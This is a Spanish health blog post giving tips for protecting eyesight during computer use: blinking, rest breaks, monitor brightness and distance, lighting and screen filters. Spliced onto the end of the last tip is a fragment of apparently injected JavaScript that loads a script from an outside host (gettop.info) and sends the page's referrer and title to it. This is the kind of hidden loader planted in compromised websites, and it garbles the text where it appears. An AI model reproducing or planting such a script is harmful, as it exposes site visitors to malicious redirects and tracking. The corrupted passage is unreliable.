Salud y belleza » Salud

Consejos para cuidar la vista al usar el ordenador

Sin Comentarios

cansancio-visual-2

Aquel que escogió el nombre “ordenador” para denominar a las computadoras, seguramente lo pensó desde un punto de vista funcional. Es que, de haberlo hecho desde una perspectiva relacionada con la salud, debería haber escogido, entonces, otro término más acorde: “desordenador”, por ejemplo.

En efecto, utilizar una computadora puede suministrarnos muchas soluciones pero también puede causarnos varios trastornos y desórdenes. La vista, por ejemplo es uno de los sentidos más dañados. Utilizar una PC de forma prolongada puede derivarnos en varias patologías serias. Por lo tanto, es sumamente necesario tener en cuenta ciertos factores al momento de sentarnos frente a un ordenador.

Aquí, algunos aspectos importantes…
-Parpadear de forma repetida. Si bien parece una acotación inútil, está comprobado que al estar frente a un ordenador, el hombre tiende a reducir la cantidad de veces que parpadea. Es justo recordar que, al parpadear, estamos cumpliendo una función esencial del ojo que ayuda a eliminar a través de las lágrimas los irritantes de la superficie de la córnea y la conjuntiva. En general, entre cada parpadeo en intervalos de 2-10 segundos, existen un promedio de 10 parpadeos por minuto. Sin embargo, cuando los ojos se centran en un objeto durante un período prolongado de tiempo, el ordenador por ejemplo, el parpadeo se reduce cerca de 3-4 veces por minuto.

- Efectuar descansos e intervalos. Lo más indicado es reposar la vista cada diez minutos, al menos durante un minuto.

- Acondicionar el monitor. Establecer un brillo y contraste bajo es un punto fundamental para proteger la vista.

-Acondicionar el ambiente. Es muy importante asegurarse que haya suficiente luz a nuestro alrededor. Si es natural, mejor por lo tanto es preferible utilizar la PC de día.

-Mantener el monitor alejado. El límite recomendado es de 60 centímetros de distancia. Alejarlo demasiado tampoco es recomendable pues nos obliga a forzar aún más la vista. Debemos encontrar un punto intermedio en la relación cerca-lejos.

-Disponer de un protector de pantalla. No hablamos del software interno que salta al tener el ordenador inactivo unos minutos, sino del accesorio que se vende en cualquier casa electrónica y ayuda a cuidar nuestra vista. Si trabajas con la PC es indispensable.

-Restringir el uso del ordenador. ¿Para qué actividades no es recomendable usar el ordenador? Para leer libros online o visualizar cualquier tipo de documento que, en su lugar, bien podría imprimirse y leerse de forma “manual”.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.